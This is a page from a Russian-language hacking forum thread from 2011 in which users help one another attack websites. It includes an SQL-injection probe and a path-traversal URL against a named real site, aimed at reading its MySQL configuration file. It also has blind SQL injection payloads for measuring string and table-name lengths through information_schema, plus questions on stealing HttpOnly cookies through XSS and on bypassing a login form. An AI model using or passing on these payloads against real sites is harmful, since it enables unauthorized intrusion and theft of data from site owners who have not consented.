HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1637 из 2438 « Первая < 6371137153715871627 1633 1634 1635 1636 1637 1638 1639 1640 1641 1647168717372137 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16361  
Старый 17.02.2011, 21:21
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию
можно узнать куки через XSS иньекцию если стоит HTTPOnly флаг?
 
Ответить с цитированием

  #16362  
Старый 17.02.2011, 21:32
foozzi
Новичок
Регистрация: 13.04.2010
Сообщений: 0
Провел на форуме:
1350

Репутация: 0
По умолчанию
подскажите,

_http://www.kemtipp.ru/news.php?id=152' здесь чтот выжать можно? чет у меня запросы не проходят
 
Ответить с цитированием

  #16363  
Старый 17.02.2011, 21:42
rootmd
Guest
Сообщений: n/a
Провел на форуме:
23579

Репутация: -5
По умолчанию
на тебе,

ht_tp://www.kemtipp.ru/show.php?f=../../../../var/www/default/mysql_data.php
 
Ответить с цитированием

  #16364  
Старый 18.02.2011, 00:49
M1lten
Guest
Сообщений: n/a
Провел на форуме:
12753

Репутация: 0
По умолчанию
Можно ли обойти эту авторизацию? Яваскрипт практически не знаю...

И почему value постоянно пустая? И сравнивается с пустой...

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]validate_auth[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"]) { var[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]; var[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"]= new Array(); var[/COLOR][COLOR="#0000BB"]_qfGroups[/COLOR][COLOR="#007700"]= {};[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]elements[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]; if ([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'login'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n - Введите логин'[/COLOR][COLOR="#007700"]; }[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]frm[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]elements[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]; if ([/COLOR][COLOR="#0000BB"]value[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]&& ![/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]errFlag[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pass'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n - Введите пароль'[/COLOR][COLOR="#007700"]; } if ([/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]) {[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Форма заполнена неправильно:'[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#DD0000"]'\n'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]_qfMsg[/COLOR][COLOR="#007700"]); return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]; } return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]; }[/COLOR][COLOR="#FF8000"]//]]> [/COLOR][/COLOR] 
 
Ответить с цитированием

  #16365  
Старый 18.02.2011, 01:10
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
Провел на форуме:
866555

Репутация: 226
По умолчанию
если чтото в яваскрипте то ты его можешь просто отключить, но бегло просмотрев там проверяется только введен ли логин/пасс или нет
 
Ответить с цитированием

  #16366  
Старый 18.02.2011, 01:15
M1lten
Guest
Сообщений: n/a
Провел на форуме:
12753

Репутация: 0
По умолчанию
Ну да, ведь паса нет. Отключать тоже пробовал, вместо логина паса значение логина и паса становится _qfMsg.

Всеравно, спасибо)
 
Ответить с цитированием

  #16367  
Старый 18.02.2011, 08:25
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию
как в blind sql injection проверить длину слова т.е. сколько символов содержит?
 
Ответить с цитированием

  #16368  
Старый 18.02.2011, 08:34
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от noviyuser  
noviyuser said:
как в blind sql injection проверить длину слова т.е. сколько символов содержит?
1+and+length(@@version)=16

если версия содержит 16 символов вернет true
 
Ответить с цитированием

  #16369  
Старый 18.02.2011, 08:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию
Цитата:
Сообщение от Redwood  
Redwood said:
1+and+length(@@version)=16
если версия содержит 16 символов вернет true
спс а как узнать длину таблицы любой?

/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--

так не работает
 
Ответить с цитированием

  #16370  
Старый 18.02.2011, 10:22
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию
Цитата:
Сообщение от noviyuser  
noviyuser said:
спс а как узнать длину таблицы любой?
/**/and/**/length(select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1)=16--
так не работает
1+and+(select+length(table_name)+from+information_ schema.tables+limit+0,1)=14
 
Ответить с цитированием
Ответ
Страница 1637 из 2438 « Первая < 6371137153715871627 1633 1634 1635 1636 1637 1638 1639 1640 1641 1647168717372137 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ